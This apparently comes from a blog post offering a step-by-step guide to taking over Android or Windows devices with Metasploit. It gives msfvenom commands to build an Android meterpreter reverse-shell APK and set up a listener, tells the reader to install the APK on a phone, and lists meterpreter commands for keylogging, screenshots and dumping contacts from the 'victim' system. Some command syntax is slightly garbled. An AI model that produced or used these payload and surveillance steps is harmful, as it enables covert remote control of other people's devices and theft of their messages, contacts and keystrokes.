How to Hack Call logs, sms , camera, contacts , filemanager on any Android, Windows : Metasploit (Payload)


Metasploit, a very powerful tool to create payload which is helpful to hack any devices.

Download it from Metasploit : Click Here




Tools Required:
                1. Linux
                2.Metasploit tool

Commands:

>>msf venom -p android/meterpreter/reverse_tcp LHOST (ur ipaddress) LPORT (port number) R> android.apk

>>msfconsole

>>use exploit/multi/handler

>>set payload android/meterpreter/reverse_tcp

>>set LHOST (ipaddress)

>>set LPORT (port number)

>>exploit

Now install the android.apk into your mobile. After opening this in mobile ur mobile got hacked.

Now try these commands to do hacking :









  • User Interface Commands

    • enumdesktops - lists all accessible desktops
    • getdesktop - get the current meterpreter desktop
    • idletime - checks to see how long since the victim system has been idle
    • keyscan_dump - dumps the contents of the software keylogger
    • keyscan_start - starts the software keylogger when associated with a process such as Word or browser
    • keyscan_stop - stops the software keylogger
    • screenshot - grabs a screenshot of the meterpreter desktop
    • set_desktop - changes the meterpreter desktop
    • uictl - enables control of some of the user interface components

  • ? - help menu - this command shows you to do all type of hacking 

For Example : type dump contacts, it will show you all the contacts in the mobile.

Happy Hacking😊






Post a Comment

0 Comments